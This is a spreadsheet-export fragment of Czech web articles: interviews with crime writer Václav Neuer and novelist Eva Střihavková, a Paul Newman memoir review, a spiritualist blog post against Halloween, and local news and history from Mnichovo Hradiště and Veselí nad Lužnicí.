co raději tajíte? Určitě. Jak už jsem zmiňoval, některé věci upravuju, aby příběh plynul svižněji. A některé metody a způsoby policejního vyšetřování jsem z kolegiality k policistům vynechal, aby kniha třeba neposkytla výhodu nebo návod těm, kdo se rozhodnou páchat trestnou činnost. Krkavčí soud je opravdu brutální hned od samého začátku. Podzim, bezdomovec, brutálně znetvořená těla… Zažil jste během své kariéry něco skutečně tak odporného? Zažil. Případ týraných a zavražděných bezdomovců se v Bratislavě skutečně stal a na jeho objasňování jsem se podílel. Některé věci člověk z hlavy nedostane a tohle bylo něco, co zaskočilo i mnohem starší a zkušenější kolegy. Na takovou práci je asi potřeba silný žaludek. Jak se s těmito věcmi člověk vypořádá? Každý jinak, ale nutno dodat, že členem „mordparty” se nestane jen tak někdo. A když se vám to podaří, obnáší to obrovskou zodpovědnost. Takže když se mi tenhle sen splnil, dělal jsem všechno proto, abych nezklamal důvěru těch, kdo mi věřili. I v těchto extrémních situacích jsem se vždy snažil udělat všechno přesně podle příruček a na nějaké emoce nebo nepříjemné myšlenky nedbat. Protože pokud člověk pokazí i jedinou maličkost, může to zmařit celé vyšetřování. Hlavní hrdina inspektor Ledecký je něco jako slovenský Harry Hole, taky má trošku problém s alkoholem . Je to klišé, nebo k práci u policie skutečně patří potíže udržet si vztahy a sklony k alkoholismu? Tady vás opravím, není to alkoholik. Inspektor Ledecký je úplně obyčejný chlap ve středních letech. Není to génius, který by k řešení případů využíval brilantní úsudek, jeho způsob práce spočívá ve využívání dlouholetých zkušeností a na rozdíl od jiných knižních detektivů je to týmový hráč. Krkavčí soud ho však zachycuje ve složité životní situaci, kdy se mu vedle problémů v práci rozpadá manželství pod rukama. ... a tak se pokouší najít oporu v alkoholu . Ano, ale ještě bych měl zmínit, že Krkavčí soud se neodehrává v současnosti, nýbrž někdy na přelomu devadesátých let a nulek, čili v době, kdy se v kancelářích ještě kouřilo a sem tam nějaká ta sklenička padla a nadřízení to tolerovali. Dnes je doba jiná. Nevěřím, že by u nás na Slovensku nebo u vás v Česku člověk se sklonem k alkoholismu vydržel u policie pracovat dlouho. Jak jste vůbec začal psát? Protože Krkavčí soud se čte jedním dechem! Vážněji jsem o psaní začal přemýšlet až potom, co jsem u policie skončil. Jsem naprostý samouk, takže jsem postupoval metodou pokus omyl a tři roky byly jediným výsledkem mé tvorby jenom odpadkové koše plné roztrhaného papíru. Jednou jsem ale v šuplíku našel svůj starší text, který se mi zpětně nezdál tak špatný. A to byl právě zárodek Krkavčího soudu, mé první knihy, která na Slovensku vyšla už v roce 2015. Od té doby píšu dál a dál, ale i když už mi letos vyjde desátá kniha, pořád se ještě nepovažuju za profesionálního spisovatele. Tedy je to pro vás spíš koníček? Ano, takové hobby. Ale velmi mě těší, že se okruh mých čtenářů rok od roku rozrůstá. A když mi někdo napíše, že se od knížky nemohl odtrhnout nebo kvůli ní probděl půl noci, považuju to za největší pochvalu. Je podle vás slovenské krimi něčím typické? V severském krimi se například často objevuje téma zneužívání, hrdinové jsou často brblající alkoholici... Myslím, že slovenské krimi se příliš neliší od té české. Jediný rozdíl je snad to, že na Slovensku nemá tento žánr tak dlouhou tradici jako v Česku a ani v současnosti se mu moc autorů nevěnuje. Ale jednoho fenoménu jsem si přece jenom všiml: od té doby, co prorazil král slovenské detektivky Dominik Dán , se u nás psaní detektivek začalo věnovat víc bývalých policistů. Pokud se nepletu, tohle je vaše první kniha přeložená do češtiny. Jaké to je číst si svou knihu v jiném jazyce? Na tuhle otázku vám odpovím s úsměvem. Číst knihu v češtině je pro mě naprosto přirozené, protože jsem čistokrevný Čech a čeština je mým mateřským jazykem. Narodil jsem se v Mostě , i když sám o sobě říkám, že jsem Plzeňák, protože jsem v Plzni vyrůstal. Na Slovensko jsem odešel studovat vysokou školu, oženil jsem se tady a takzvaně zapustil kořeny. Strávil jsem tady celou svou profesní kariéru a narodily se mi tu dcery. Zbytek rodiny mám ale v Česku, takže po překročení řeky Moravy automaticky přepínám do češtiny (smích). VÁCLAV NEUER (* 1970) Vlastním jménem Václav Kincl . Přes 20 let sloužil u policie, dokonce v elitním týmu bratislavské mordparty. Zde prožil i divoké devadesátky a podílel se na vyšetřování nejděsivějších a nejsložitějších případů slovenské historie. Po odchodu od policie se začal věnovat psaní. Jeho detektivky sice vždy vycházejí ze skutečných námětů, ale příběhy jsou notně upravené. Na Slovensku autorovi letos vyjde už desátá kniha, v Česku je Krkavčí soud první publikovanou knihou autora. Noxi, 399 Kč, již vyšlo Proč Krkavčí soud? „Název knihy odkazuje k povídce Karla Kálala , českého spisovatele a slovakofila, který na počátku 20. století působil na Slovensku . Můj úžasně sečtělý kamarád Michal Nemec, který při mně stál, když jsem začínal psát, si přečetl rukopis mé prvotiny a vzpomněl si, že tahle stará báchorka můj příběh perfektně vystihuje. A tak nakonec knize dala i název,“ vysvětluje Václav Neuer. Autor: text: Vavřinec Fiala foto: archiv Václava Kincla Autor person Vavřinec Fiala Rubrika transition_slide ROZHOVOR</t>
  </si>
  <si>
    <t>20241101_307_3243217410_ecf2c935767d141831ad.html</t>
  </si>
  <si>
    <t>ecf2c935767d141831ad</t>
  </si>
  <si>
    <t>Neobyčejný život obyčejného muže</t>
  </si>
  <si>
    <t>Neobyčejný život obyčejného muže // Paul Newman Paul Newman byl fenomenální americký herec i režisér, úspěšný automobilový závodník a filantrop. Newmanova kniha pamětí je snahou uvést na pravou míru spoustu věcí, které chtěl vysvětlit svým dětem. Je tak trošku sebezpytováním, rozebíráním pocitů, motivů a pohnutek, ale i upřímnými vzpomínkami a názory jeho rodiny, přátel z filmové branže i mimo ni, například kamarádů z námořnictva, kde za druhé světové války sloužil jako radista a střelec na torpédových bombardérech. Jedinečný člověk, který se nikdy nepřestal učit a snažil se zlepšovat sebe i svět kolem sebe. Nikdy však nepřestal usilovat o nepolapitelnou „dokonalost“, o které vždy mluvil, ať už ve svém herectví, závodění, filantropii… Jak sám o sobě prohlašoval, měl víc houževnatosti než talentu, ale to mu ne každý uvěří. Herec s pronikavě modrýma očima byl fyzicky velice pohledný a v šedesátých letech 20. století byl považován za sexuální symbol. Ze zajímavostí, které jsem o Paulovi Newmanovi nevěděla, bylo například to, že jeho matka pocházela z Rakousko- Uherska, z míst, kde leží dnešní Slovensko , nebo že měl židovský původ a obrovské problémy s alkoholem , které bohužel v jeho rodině nebyly ojedinělé. Nebo že byl velice inspirativním člověkem právě pro filantropii, kterou považoval za svůj největší životní odkaz. Jako politický aktivista a humanitární pracovník shromáždil a daroval téměř jednu miliardu dolarů mnoha charitativním organizacím, což je opravdu fascinující. Neobyčejný život obyčejného muže je podtitulem knihy jeho pamětí. A právě význam slov „neobyčejný“ a „obyčejný“ totiž po přečtení knihy dokonale pochopíte. Upřímně zde přiznává své plusy i minusy, vzlety i pády. Kniha udělá radost všem, které Paul Newman uhranul jako největší frajer v Hollywoodu , i těm, kteří obdivovali „americký sen“, jenž žil, jeho nesmírnou pracovitost i široký záběr aktivit. Měl šest dětí a byl padesát let ženatý s oscarovou herečkou Joanne Woodwardovou . Zemřel v roce 2008 ve věku třiaosmdesáti let. Práh, 499 Kč, již vyšlo Autor: Lucie Bednářová Autor person Lucie Bednářová</t>
  </si>
  <si>
    <t>20241101_308_3243206641_5d800ff71fb0527dbef8.html</t>
  </si>
  <si>
    <t>5d800ff71fb0527dbef8</t>
  </si>
  <si>
    <t>Hlavní postavou je moje prababička</t>
  </si>
  <si>
    <t>Hlavní postavou je moje prababička Rubrika: ROZHOVOR Když se jí zeptáte, jaký je to pocit držet v ruce svou pátou knížku v pořadí, odpoví, že směsice štěstí, radosti, ale taky obav. Ty ale v případě Evy Střihavkové nejsou na místě – její nový příběh s názvem Seznam Evelíny B. vás chytne a nepustí. Mimo jiné i proto, že je v něm otisk skutečného života. Jak byste svou novinku popsala? Je to příběh o křehkých lidech, které skličoval strach tak velký, že o lecčems nemluvili. Děj je zasazen do 50. let. Asi nejlépe tu dobu vystihnul Jan Zahradníček v básni Znamení moci, která začíná slovy: „Bylo k za lknutí“. Moje postavy nejsou interprety mravnosti, jen se snaží s dobou, ve které žijí, vypořádat po svém. Nejtěžší pro mě bylo najít vhodný jazyk, kdy je toho tolik, co ty lidi dusí, ale nemluví. Nemám v literatuře ráda doslovnost a přepjatost. Jestli se mi tomu povedlo vyvarovat a zachovat tvar, nevím, nemám odstup. Nakolik jste se inspirovala skutečnými lidmi a událostmi? Všichni ti lidé byli skuteční, některé jsem znala. Hlavní postavou je moje prababička – za první republiky jezdila na motorce, hrála na saxofon, vystudovala jako první žena zahradní architekturu. Ale okolo toho se děj netočí. Ten příběh by mě bavil psát, i kdyby nevycházel z mé rodinné historie. Události v knize jsou také povětšinou skutečné. Třeba proces s Borisem Kovaříčkem v roce 1949, který vyústil ve vraždu studentů práv. Slyšela jsem, že je s vámi spřízněná i prvorepubliková filmová hvězda Lída Baarová , která v knížce také figuruje. Je to pravda? Ano, z matčiny strany. Do osudu každé z mých postav se Lída otiskla, ale je vedlejší postavou. Důležitou roli v ději hraje vila od Ladislava Žáka na Hanspaulce , kterou si nechala Lída společně se svým tátou postavit. Ten dům až do smrti nenáviděla. Když po revoluci navštívila Prahu a řešila se možnost, že by vilu získala zpět, nechtěla ji. V každé rodině kolují historky, máte nějakou právě o Lídě? Píšu třeba o tom, kde skončila část jejích šperků, drahého oblečení, ale i o tom, jak si ráda v kamnech opékala buřty. Do své předchozí knížky s názvem Dýchej za mě jste investovala dva roky života. Kolik času a energie to bylo tentokrát? Ty procesy se v určitý moment překrývaly a trvaly stejně dlouho. Baví mě ta část, kdy stavím příběh v hlavě, povídám si s pamětníky a pročítám dopisy staré sto i více let, a nahlížím tak do vztahů a nitra těch mrtvých lidí. V jakém jste vlastně rozpoložení, když začínáte psát nový příběh? Je to stejné, jako když přijdete někam, kde je to fakt hezké nebo zažijete souznění během dlouhého rozhovoru s člověkem, a máte chuť dát si z té radosti cigaretu. Určitě to znáte... Dodržujete při psaní nějaké rituály? Píšu nahodile, podle času. Ale abych mohla psát, musí si sednout všechno okolo. Důležité je pro mě udržovat přátelství. Zvlášť těch mužských si cením a mám štěstí, že má pro ně můj kluk pochopení. Mám kamarády, se kterými jsem procestovala Evropu a nikdy to nebyl problém. I pár kamarádek mám, ale mužští přátelé mi dávají jiný druh nadhledu. Takže můj jediný rituál je udržovat si spokojenost skrz fungující vztahy. A jak jde práce na knížce dohromady s péčí o dvě malé děti? Než jsem měla děti, pořád jsem někde byla. Teď jsem většinou večer doma a když spí, tak píšu. Děti mě neomezují. Málokdo mě v tomhle chápe, ale nic bezstarostnějšího než ukazovat malým zdravým dětem, jak funguje svět, pro mě neexistuje. Z mého života nevymizelo nic z toho, na co jsem byla zvyklá před dětmi. Když to nejde jinak, kamarádi se mnou občas zajdou na hřiště. Po tom všem, co jsme spolu zažili a kde všude jsme byli, mi přijde zábavné, když vedle mě stojí kamarád na dětském hřišti a zvedá Almu na klouzačku nebo dělá bábovičky a ani si nevšimne, že u toho mluví vyšším hlasem, aby se dětem líbil. Komu dáváte číst nový příběh jako prvnímu? A nakolik se řídíte jeho radami? Jsem netrpělivá a nestíhám tuhle cnost trénovat. Vždycky text sice pošlu sestře, ale to už ho má dávno nakladatel. Redaktorčinými připomínkami se řídím téměř bez výhrad. Dělají text preciznějším. Na začátku mě upozorňovali, že se budu hádat o každé slovo. Zatím to nedělám. Váš nový román vydalo nakladatelství Rosier. Jak byste vaši spolupráci definovala? Jsem vděčná, že Zdeněk Novák , majitel nakladatelství, v moje knihy věří. Před vydáním první knihy se se mnou sešel, a to na mě zapůsobilo. Člověk se potom necítí jen jako položka v edičním plánu a má z tvorby radost. A co byste si přála, aby si čtenáři z vaší nové knížky odnesli? Že svoboda je předpokladem všeho dobrého, musíme ji hájit a že to není floskule. Proč psát znovu o totalitě, jsem si obhájila už dávno a potom znovu v jedné z redakcí. Byla jsem přítomna absurdní situaci, kdy zavolalo vedení, že je potřeba vystřihnout Romana Janouška z reportáže o pohřbu komunisty Štěpána. Staré opovrženíhodné struktury stále fungují. Jasně, třeba denacifikace Německa taky neproběhla hned a byla problematická, ale nebuďme dnes mírní. Dokud budeme zbytky minulosti v podobě pochybných kreatur přehlížet, vrátí se silnější. Knihkupec je magazín o knížkách. Jaká jste vy sama čtenářka? Nejsem typ, který by měl potřebu zavírat se před světem s knihou, mám ráda lidi. Až když jsem společensky nasycená, můžu se soustředit na čtení, a to samé platí pro psaní. Čtení ani psaní pro mě nejsou únikem ani terapií. Jsou svobodou. Natočila jsem v práci rozhovory s lidmi, mezi kterými byli političtí vězni, lidé, kterým bylo přes sto let i lidi, kteří dělají něco s vášní, ale také podvodníci, politici a další. Povídání si s lidmi pro mě vždycky bude důležitým výchozím zdrojem, protože vidíte gesta, vnímáte hlas i životní jiskru. V knihách je spousta věcí, ale pouze z nich si představu o světě a lidech neuděláme. A co se četby týče – loni mě zaujala několik let stará kniha Lenka od Anny Fodorové, bez patosu napsala knihu o smiřování se s umíráním své mámy Lenky Reinerové . Před tím jsem v rozhlase slyšela vzpomínky Reinerové . Částečně mi to dokreslilo vztah, který mezi sebou jako matka s dcerou měly. Ale úplně nejvíc se mi líbila kniha rozhovorů s Jitkou Válovou, akademickou malířkou a výtvarnicí, chtěla bych se s takhle ryzím člověkem znát. Jakou cestou jste se dostala ke psaní? První knihu jsem napsala po absurdním zážitku, kdy jsme se vloupaly se ségrou do zahrad oseckého kláštera. Chytil nás hlídač, my mu řekly, že jsme zdrhly z klášterního sboru a on nás pozval na pivo . Psát jsem ale málem začala dřív – z donucení. Na vysoké škole jsme měli povinný předmět tvůrčí psaní, vyučovala ho Radka Denemarková . Museli jsme tam předčítat své texty a pak si je navzájem hodnotit. Mně se nic psát nechtělo, vztekala jsem se. Hodiny připomínaly podivnou skupinovou terapii, probrali jsme v textech spolužáků znásilnění, nevěry a zlomená srdíčka a já chtěla být všude, jen ne v té třídě. Opravdu jste nic nenapsala? Paní Denemarková řekla, že když nic nenapíšu, nedostanu zápočet. Vzteklá jsem napsala něco o hovězím vývaru. Když jsme na konci semestru měli zápočtové čtení, kamarád Dominik sepsal historku o tom, jak byl v hospodě s havíři ve Frýdku-Místku a já ji vydávala za svou. Čtení bylo na lodi, Radka Denemarková nás představovala publiku a jak byla celý rok u těch „terapií“, tak o každém řekla něco „hlubokého“. Asi nevěděla, co říct o mně, a tak prohlásila, že jsem motýlek, kterého nic netíží. Tím mě vytočila, ale nemohla jsem odejít, protože jsme byli uprostřed Vltavy . Po tomhle zážitku jsem si kladla otázku, jestli má smysl psát, když jsem tak bezstarostná. Ale kdybych měla starosti, soustředila bych se místo psaní na jejich řešení, vzhledem k tomu, že psaní pro mě není terapií. Věřím, že umění vzniklé z radosti a lehkosti může být rovnocenné tomu, které vznikne z utrpení. Vidím to u svých přátel. Všechno je o empatii. Rosier, 399 Kč, vychází 6. listopadu EVA STŘIHAVKOVÁ (* 1990) Spisovatelka, bývalá novinářka, v současnosti se věnuje krizové komunikaci v soukromém a neziskovém sektoru. Vystudovala tvůrčí psaní, mezinárodní vztahy a dějiny umění. Na kontě má novelu Vzácná návštěva a romány Můj grónský rok, Opička na gumě a Dýchej za mě. Novinka s názvem Seznam Evelíny B. vychází v nakladatelství Rosier. S bubeníkem Adamem Kollerem má dvě děti. Autor: text: Martina Vlčková foto: archiv Evy Střihavkové Autor person Martina Vlčková Rubrika transition_slide ROZHOVOR</t>
  </si>
  <si>
    <t>20241101_309_3243064416_32012771073c486bd964.html</t>
  </si>
  <si>
    <t>32012771073c486bd964</t>
  </si>
  <si>
    <t>Mnichovo Hradiště</t>
  </si>
  <si>
    <t>Mnichovo Hradiště Věnec pro Františka Mendíka 2024 01.11.2024 Aktuality V podvečer svátku Památky zesnulých, 2. 11. 2024 v 17:00 byl opětovně položen věnec na hrob Františka Mendíka (1859-1947), čestného občana města Mnichovo Hradiště , při příležitosti letošního 165. výročí narození. Letos jej zhotovil a na hrob položil Karel Hubač. Došlo tak ke splnění jeho přání, které měl, když sám v roce 1947 v Praze umíral a svůj majetek našemu městu odkázal, ale také k opětovnému pokračování tradice, přerušené v 80. letech 20. století. Obnovení tradice se v roce 2017 ujali členové městského parlamentu, v současnosti již však nečinného. V tradici za městské muzeum budeme pokračovat i nadále. František Mendík mj. bývalý ředitel městské spořitelny v Mnichově Hradišti, se na přelomu 19. a 20. století zapojoval do kulturního a politického dění města v mnoho ohledech. Byl členem téměř všech mnichovohradišťských spolků. Mnichovu Hradišti věnoval František Mendík dům v Praze v Hradešínské ulici (po úmrtí svých dětí i ženy). Před odstěhováním se do Prahy bydlel na náměstí v domě čp. 33. Unikátní jsou jeho vlastní rukou zachycené vzpomínky na život v našem městě z 2. poloviny 19. století a počátku 20. století, věnované a uložené v archivu městského muzea. O jeho životě i dalších osobností Mnichova Hradiště čtěte více ZDE Foto: KH, Muzeum města Mnichovo Hradiště 10 x TIP: Akce na Mnichovohradišťsku Od Výstava fotografií, kreseb a grafiky Martiny Bachové. Vstup zdarma. kde: Nábytek Honza, Víta Nejedlého 1299, Mn. Hradiště [výstava] Muzejní tradiční listopadová akce, procházka po hřbitově v Mnichově Hradišti spojená s povídáním o významných osobnostech města. kde: Hřbitov Mnichovo Hradiště kde: Městský hřbitov Mnichovo Hradiště [historie] 140 Kč (český dabing) Rodinka kouzelníků žije ve světě lidí a jenom jejich dcera Betty kouzlit neumí... kde: Kino Mnichovo Hradiště Rok vdovy 140 Kč Film podle skutečných událostí o ženě, která se ve čtyřiceti stala zadluženou vdovou a musela ze dne na den řešit spoustu problémů a zároveň najít odvahu dál smysluplně žít. kde: Kino Mnichovo Hradiště Pyšná princezna 140 Kč Animovaná verze slavné pohádky vychází velmi věrně ze známého Zemanova filmu. Animace čerpá z krásy české krajiny a detailně zpracovaná vizuální stránka zaručuje velký zážitek! kde: Kino Mnichovo Hradiště Svatomartinský lampionový průvod Na tradičním Svatomartinském setkání 11. listopadu od 17:00 přivítáme u radnice na Masarykově náměstí sv. Martina na bílém koni, po hudebním úvodu se společně vydáme lampionovým průvodem do farní zahrady. Zveme vás k pohoštění, na svatomartinské víno , svařák a občerstvení pro děti. Nezapomeňte si do průvodu vlastní lampion. Těšíme se na viděnou! kde: Masarykovo náměstí , Mnichovo Hradiště [Slavnost] Anglická konverzace pro dospělé (s možností využít hlídání dětí v herně). Bližší informace a rezervace na lekci provádějte přímo u lektorky Joanny Mary Hulbert na telefonu: +420 735 531 432 (sms / whats app). kde: Volnočasové centrum Mnichovo Hradiště [volnočasové centrum] Představujeme Klaudiánovu porodnici. Beseda s porodními asistentkami mladoboleslavské porodnice o novinkách, kurzech a trendech. ZDARMA kde: Volnočasové centrum Mnichovo Hradiště [volnočasové centrum] Přijďte si vyměňovat zkušenosti s pátráním po předcích, mapovat typická příjmení Mnichovohradišťska a zjišťovat vzájemnou příbuznost. kde: Dům Ludmila, Na Návsi 229, Veselá [ostatní] Autor: Město Mnichovo Hradiště</t>
  </si>
  <si>
    <t>548</t>
  </si>
  <si>
    <t>325</t>
  </si>
  <si>
    <t>20241101_31_3264650700_67a31178119d87537f3c.html</t>
  </si>
  <si>
    <t>67a31178119d87537f3c</t>
  </si>
  <si>
    <t>Kritický pohled na Halloween a průvody strašidel</t>
  </si>
  <si>
    <t>Shrnutí Kritický pohled na Halloween a průvody strašidel Publikováno 01.11.2024 v 19:29 v kategorii Nezařazené, přečteno: 111x Období našich svátků zesnulých se překrývá se „svátkem Halloween“, přicházejícím k nám ze západu. Jeho součástí jsou průvody čarodějnic, čertů, upírů a jiných strašidel. A čím jsou tyto masky hrůzostrašnější a děsivější, tím lépe! Tím je větší legrace! Ale je to opravdu jen legrace a nic víc? Asi zcela ne, protože na druhé straně se ozývají různí jednotlivci, ale i různé církve, které s těmito průvody nesouhlasí a sepisují petice, aby je městské, nebo obecní úřady nepovolily. Vidí v nich totiž propagaci zla a temných sil. To se samozřejmě modernímu, ateistickému a materialistickému člověku s jeho snahou užít si dosyta nejrůznějších zábav jeví jako nepochopitelný závan středověku. Jeví se mu to jako zkostnatělá a prudérní ztráta smyslu pro humor. Ale protože materialisté a ateisté vnímají všechny věci jen povrchně, z jejich prvoplánově materialistického hlediska, podívejme se na danou problematiku poněkud hlouběji a ukažme si, co se ve skutečnosti skrývá pod navenek prezentovaným povrchem dobré zábavy. Všechny průvody a pochody tlumočí společnosti toto: „Jsme tady a máme takovýto názor. Dáváme o sobě vědět a je třeba s námi počítat.“ A tak je tomu také v případě různých průvodů čertů, strig a strašidel. Že je to jen humor, zábava a žert, je totiž jen pohádku pro povrchní a prvoplánové. Naopak, povrchnost a prvoplánovost lidí, kteří příliš neuvažují, je dokonale využita k tomu, aby bylo ve společnosti prezentováno to, o co ve skutečnosti pod zástěrkou zábavy jde. A jde o manifestaci temných sil, které dávají společnosti na známost: „Jsme tady a máme své hodnoty! Dáváme o sobě vědět a je třeba s námi počítat!“ Průvody čertů, strig a strašidel, tedy všechno jednoznačně negativních bytostí, jsou reálným svědectvím naší doby, která svou mělkostí myšlení, amorálností, duševní prázdnotou, nectnostmi a nezřízeností vášní navazuje kontakt se sobě stejnorodými, nízkými úrovněmi stvoření. A bytosti z těchto nízkých úrovní pochodují v hrůzostrašných průvodech po našich městech a vesnicích, reprezentujíc temné síly, které se rozpínají po naší planetě, aby ji zcela ovládly. Taková je tedy žel naše moderní civilizace, která inklinuje k nízkosti a temnotě, protože sama je takovou. Vždyť si jen zkusme položit otázku, proč se například v našich městech a vesnicích neorganizují pochody andělů a různých světlých bytostí, které by představovaly ctnosti? Vždyť přece kromě našemu pozemskému oku neviditelných, temných a nízkých úrovní, zalidněných nejrůznějšími hrůzyplnými bytostmi, existují také vysoké a vznešené úrovně, obývané nádhernými, ušlechtilými a ctnostnými bytostmi. Proč našemu světu není blíže toto směřování? Proč nebere inspiraci odtamtud? Proč neorganizujeme průvody tohoto druhu a tvůrci kostýmů a masek se ve své inspiraci nenapojují do těchto úrovní? Protože vrána k vráně sedá a rovný rovného si hledá! Protože převažující nízkost v duších nachází sympatie a stejnorodé spojení s odpovídajícími, nízkými jemnějšími úrovněmi univerza. No a je zcela samozřejmé, že tento trend a toto propojení se příčí lidem, kteří si ještě zachovali alespoň určitou míru ušlechtilosti a soudnosti. Tito lidé mnohdy ne vědomě, ale podvědomě tuší, o co tady jde, a staví se proti tomu. Staví se proti rozpínavosti temnoty, ovládající duše lidí. Staví se proti prezentaci její moci a touze po expanzi, demonstrované pochody padlých, nízkých a ohyzdných bytostí. A když jsme si už objasnili, co všechno se skrývá za touto zdánlivě nevinnou zábavou, zkusme se ještě zamyslet nad tím, kde se cosi takového, jako jsou čerti vůbec vzalo? Každému je jasné, že se nejedná o bytosti z našeho světa, tedy z naší hrubé hmotnosti. Kromě hrubé hmotnosti však existují různé úrovně jemné hmotnosti, kam odcházejí lidské duše po smrti fyzického těla. Každý ví, že lidé jsou buď dobří, nebo špatní. Zlo naše duše zatěžuje a dobro naše duše povznáší. Podle míry dobra a zla má tedy každá duše po odložení fyzického těla určitou tíž. Čím je ušlechtilejší a lepší, tím je tíž menší, a čím je duše zkaženější a negativnější, tím je tíž větší. A tak, na základě zákona duchovní tíže, klesají duše zatížené nízkostí do nízkých úrovní jemné hmotnosti a naopak, duše nadlehčené ušlechtilostí stoupají do vysokých úrovní jemné hmotnosti. Tam se dále zušlechťují v konání dobra a v ctnostech, aby nakonec, po dosažení lidské dokonalosti, mohli vstoupit z jemné hmotnosti do věčného, duchovního království nebeského. K pochopení, odkud pocházejí čerti, je třeba vědět, že čím je duše zkaženější a nižší, tím ohyzdnější vnější formu dostává. A naopak, čím je duše ctnostnější a lepší, tím je její vnější forma ušlechtilejší a krásnější. Potvrzení fungování této zákonitosti můžeme najít už tady na zemi, když například někdo enormním způsobem holduje alkoholu a jeho neřest časem začíná být viditelná i na jeho vnějším vzhledu. A podobně je to také s drogami. No a po naší smrti, ve světě jemné hmotnosti, se tato zákonitost mnohokrát znásobuje. To znamená, že jakákoli neřest a nízkost se mnohem očividněji odráží na vzhledu duševního, jemnohmotného těla každého jednotlivce. Čím je tedy někdo horší, tím ohyzdnější podobu má jeho jemnohmotné tělo. A jde to až tak daleko, že lidé ztrácejí svou lidskou podobu a stávají se z nich polo zvířecí a pololidské, strašidelné a ohyzdné bytosti. Čerti tedy nejsou žádný nový a zvláštní druh. Čerti jsou ve skutečnosti lidé, nelidsky znetvořeni vlastní nízkostí. Stejný princip však platí také v pozitivním slova smyslu, protože jemnohmotná těla lidí ušlechtilých, čestných, spravedlivých, dobrých a laskavých nabývají ušlechtilé a vznešené formy, podobající se formám andělským. Takže aby nám bylo všem jasné, čerti jsou ve skutečnosti nízké, padlé a ubohé lidské duše, nacházející se v nízkých úrovních jemné hmotnosti. Sem se kontaktovat, sem se orientovat, odtud se inspirovat a na náš svět přinášet průvody těchto nízkých, nešťastných, znetvořených a nejrůznějšími neřestmi spoutaných bytostí, není rozhodně nic pozitivního. Je to jen ubohé a politování hodné spojování se s nízkostí. Není to nic pozitivního, na co by se měli lidé orientovat. Lidé by se měli orientovat opačným směrem. Ne tedy dolů, ale vzhůru! Ne do nížin, ale do výšin! Tam, ve vysokých úrovních jemné hmotnosti, přebývají ušlechtilé a ctnostné lidské duše, jejichž ušlechtilá vnější duševní forma je výsledkem jejich života v souladu s principy dobra, lásky, spravedlnosti a ušlechtilosti. Tím směrem by bylo žádoucí se orientovat a inspirovat! Ne tedy do nížin, ale k výšinám máme upírat svůj zrak! Odtud máme čerpat a přinášet to sem dolů k nám na zem, aby se naše planeta stávala stále lepší, a ne stále horší. ve spolupráci s https://smeromkzivotu.blogspot.com/ Jméno: Přihlásit se Blog: Obsah zprávy*: Kontrolní kód*: Rubrika transition_slide Nezařazené</t>
  </si>
  <si>
    <t>20241101_310_3243261082_b3b6f5402c85a3586289.html</t>
  </si>
  <si>
    <t>b3b6f5402c85a3586289</t>
  </si>
  <si>
    <t>O MĚSTĚ</t>
  </si>
  <si>
    <t>O MĚSTĚ náměstí T. G. Masaryka 26 391 81 Veselí nad Lužnicí I Tel/fax: +420 381 548 111 / +420 381 583 721 E-mail/web: mesto@veseli.cz / www.veseli.cz IČ/DIČ: 00253081 / CZ00253081 Účet - příjmový: 19-0701494349/0800 Veselí nad Lužnicí (k 01.01.2023 6 488 obyvatel) leží v třeboňské pánvi na soutoku řek Lužnice a Nežárky v nadmořské výšce okolo 410 metrů . Je důležitou železniční a silniční křižovatkou. Poprvé bylo Veselí doloženo k r. 1259. Z majetku Rožmberků přešlo pak na krátkou dobu ke koruně královské. Roku 1362 je Karel IV. povýšil na město a obdařil právy, jaká měly České Budějovice . O Mezimostí je první zmínka z r. 1322 a na město bylo povýšeno v r. 1908. Ke sloučení sousedících měst Veselí a Mezimostí došlo nařízením v roce 1943. Součástí města je od roku 1980 městská část Horusice , ležící čtyři kilometry jihozápadně od Veselí. HISTORIE Město Veselí nad Lužnicí leží ve středu jižních Čech , na soutoku řek Lužnice a Nežárky . Vzniklo spojením dvou měst - Veselí a Mezimostí . K nejvýznamnějším architektonickým památkám patří renesanční domy na náměstí. Radnice z roku 1579, částečně barokně upravená před rokem 1763, a muzeum „Weisův dům“ s psaníčkovými sgrafity jsou dominantou severní strany náměstí T. G. Masaryka . Za pozornost jistě stojí i dům č. 22 na západní straně náměstí se třemi renesančními štíty. Veselský kostel má gotický původ, upraven byl v renesanci. Nese jméno Povýšení sv. Kříže a nadmořská výška kopečku, na kterém je postaven, je 429 m n. m. Významnou památkou je i secesní sokolovna z roku 1905, která je nyní v rekonstrukci. Sportovní areál TJ Lokomotiva nabízí spoustu možností od lehkého protažení až k pořádnému potýrání těla. Na své si zde přijdou i milovníci koupání. Písková jezera nabízejí osvěžení nejen plavcům, ale i milovníkům surfování nebo i obyčejných šlapadel. Pro vodáky je veselský kemp tradiční zastávkou. Skoro každý místní obyvatel je majitelem jízdního kola a návštěvníkům doporučujeme, aby si nějaké pořídili. Třeba výlet na Blatskou stezku s prohlídkou architektury selského baroka v okolních vesnicích může být příjemným zážitkem. Historie Veselí a Mezimostí Veselí Kdy Veselí vzniklo, můžeme pouze hádat. Jisté je, že nejdříve zde byla vybudována tvrz na místě zvaném „Na Talíři“. Tu dnes připomíná zalesněný pahorek a obepínající příkop v severozápadní části města. Blízké okolí, na němž pravděpodobně stávaly stráže, se dodnes nazývá „Na Strážkách“. Pod tvrzí potom vznikla osada Veselí. Název prozrazuje, jak tu bývalo, když zde Rožmberkové pořádali různé kratochvíle a veselice. První písemná zmínka pochází z roku 1259. To Veselí vlastnil Vok z Rožmberka a osada byla pravděpodobně velice ekonomicky soběstačná. Roku 1302 se majitelem stává český král Václav II. a roku 1362 bylo Veselí Karlem IV. povýšeno na komorní město. V patnáctém století bylo město několikrát vypáleno a pleněno. Za vlády Petra Voka z Rožmberka nastal mohutný rozmach rybníkářství a Veselí se zotavuje z téměř půlstoletí husitských válek. Od roku 1612 se zde ujali správy Švamberkové. Město začalo chudnout. Za Českého povstání využívala vojska strategické polohy města - česko-rakouské brány a neustálé přesuny, drancování a plenění město poznamenaly. Od 27. září do 2. října 1619 ležela ve Veselí armáda knížete Hohenlohea a Linharta z Felsu. Po bitvě na Bílé hoře a porážce českých stavů dostává Veselí císařskou milost a je mu odpuštěna rebelie za Českého povstání. Opět se zavádějí trhy a povoluje se vařit pivo . Protože bylo panství velice zpustošené, přišla bída a hlad, lidé odtud utíkali. Ve Veselí zůstalo z 97 usedlých jen 53, v Mezimostí z 38 jen 16. Rekatolizace proběhla bez odporu a 2. dubna 1660 je celé třeboňské panství darováno Janu Adolfu Schwarzenbergovi . Rod Schwarzenbergů byl posledním šlechtickým rodem, který Veselí vlastnil. Až v roce 1918 získalo město plnou samostatnost. Významnou událostí pro 